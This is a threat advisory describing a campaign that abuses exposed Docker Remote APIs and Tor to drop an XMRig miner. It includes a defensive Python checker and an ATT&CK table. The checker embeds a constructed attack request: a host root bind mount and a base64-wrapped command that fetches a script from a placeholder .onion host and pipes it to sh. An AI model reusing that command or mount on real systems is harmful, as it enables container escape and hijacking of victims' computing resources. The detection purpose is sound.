EXECUTIVE SUMMARY:
A new cyberattack has been identified in which threat actors exploit misconfigured Docker Remote APIs in combination with the Tor anonymity network to deploy cryptocurrency mining malware. This technique allows attackers to gain unauthorized access to containerized environments and conceal their activities. The campaign targets organizations relying heavily on cloud infrastructure, particularly within the technology, finance, and healthcare sectors.
The attack begins with the attacker sending a request to the Docker Remote API to enumerate available containers. Upon confirming that no containers are running, the attacker issues a container creation request using the lightweight “alpine” Docker image. In this request, the host root directory is mounted into the container, enabling potential container escape and host-level manipulation. The command executed within the container is base64-encoded to evade detection; once decoded, it installs Tor. Through Tor, the container anonymously retrieves and executes a remote script hosted on a hidden “.onion” service. All traffic, including DNS resolution, is routed through Tor using the “socks5h” proxy scheme, which keeps the hidden service address from ever being resolved locally. The payload eventually drops a binary containing a bundled XMRig miner, pre-configured with wallet addresses, mining pool information, and execution parameters. This self-contained dropper minimizes external dependencies, enhances stealth, and streamlines deployment.
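As an added, defender-side example (not code from the original advisory): a small Python checker that inspects a Docker `/containers/create` request body, as an API audit log or a reverse proxy in front of the daemon might capture it, for the two hallmarks described above: a host root bind mount and a base64-wrapped command that installs Tor and fetches a script over socks5h from a .onion address. The request body, the `/hostroot` mount target and the `PLACEHOLDER.onion` host are constructed for this example.

```python
import base64
import re

# Indicator strings taken from the campaign description: Tor install, socks5h
# proxying, a .onion download and the XMRig miner name.
SUSPICIOUS_PATTERNS = [r"\btor\b", r"socks5h://", r"\.onion\b", r"\bxmrig\b"]


def decode_base64_tokens(text):
    """Decode every base64-looking token (16+ chars) embedded in a command string."""
    decoded = []
    for token in re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", text):
        try:
            decoded.append(base64.b64decode(token, validate=True).decode("utf-8", "replace"))
        except ValueError:  # not valid base64 after all (binascii.Error is a ValueError)
            continue
    return decoded


def analyze_create_request(body):
    """Return a list of findings for one /containers/create request body (parsed JSON dict)."""
    findings = []
    # Host root bind-mounted into the container: the escape primitive the campaign relies on.
    for bind in body.get("HostConfig", {}).get("Binds", []) or []:
        if bind.split(":", 1)[0] == "/":
            findings.append(f"host root bind-mounted: {bind}")
    # Inspect the command as sent and anything base64-encoded inside it.
    cmd = " ".join(body.get("Cmd", []) or [])
    for surface in [cmd] + decode_base64_tokens(cmd):
        for pat in SUSPICIOUS_PATTERNS:
            if re.search(pat, surface, re.IGNORECASE):
                findings.append(f"indicator {pat!r} in command: {surface[:50]!r}")
    return findings


# Constructed sample request modelled on the described chain (not a real capture).
ENCODED = base64.b64encode(
    b"apk add --no-cache tor curl && (tor &) && sleep 20 && "
    b"curl --proxy socks5h://127.0.0.1:9050 http://PLACEHOLDER.onion/x.sh | sh"
).decode()
SAMPLE_CREATE = {
    "Image": "alpine",
    "Cmd": ["sh", "-c", f"echo {ENCODED} | base64 -d | sh"],
    "HostConfig": {"Binds": ["/:/hostroot"]},
}

if __name__ == "__main__":
    for finding in analyze_create_request(SAMPLE_CREATE):
        print(finding)
```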
This campaign exemplifies how threat actors combine container platform vulnerabilities with privacy networks such as Tor to conceal malicious activity. Understanding these tactics is critical for organizations to strengthen their security posture, particularly those heavily reliant on containerized environments in the cloud. Continuous monitoring of exposed Docker APIs, proper configuration management, and integration are essential to detecting and mitigating such stealthy cryptomining campaigns.
THREAT PROFILE:
| Tactic | Technique Id | Technique | Sub-technique |
|---|---|---|---|
| Resource Development | T1583.006 | Acquire Infrastructure | Web Services |
| Initial Access | T1190 | Exploit Public-Facing Application | – |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Execution | T1059.004 | Command and Scripting Interpreter | Unix Shell |
| Execution | T1203 | Exploitation for Client Execution | – |
| Defense Evasion | T1090.003 | Proxy | Multi-hop Proxy |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| Impact | T1496 | Resource Hijacking | – |
REFERENCES:
The following reports contain further technical details: